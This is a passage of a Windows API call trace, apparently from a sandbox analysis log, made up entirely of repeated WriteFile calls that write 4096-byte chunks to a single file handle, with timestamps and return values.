hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.831] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.831] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.831] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.831] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.832] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.832] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.832] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.833] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.833] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.833] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.833] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.834] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.834] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.834] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.834] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.835] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.835] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.835] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.835] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.836] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.836] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.836] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.837] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.837] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.837] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.837] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.838] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.838] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.838] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.839] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.839] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.839] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.840] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.840] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.840] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.840] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.841] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.841] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.841] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.841] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.842] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.842] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.842] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.843] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.843] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.843] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.843] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.844] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.844] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.844] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.845] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.846] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.846] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.846] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.846] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.847] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.847] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.847] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.847] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.848] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.848] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.848] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.848] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.849] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.849] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.849] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.849] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.850] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.850] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.850] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.850] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.850] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.858] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.859] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.859] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.859] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.859] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.860] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.860] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.860] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.860] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.861] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.861] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.861] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.862] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.862] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.862] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.862] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.863] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.863] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.863] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.863] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.864] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.864] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.864] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.864] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, 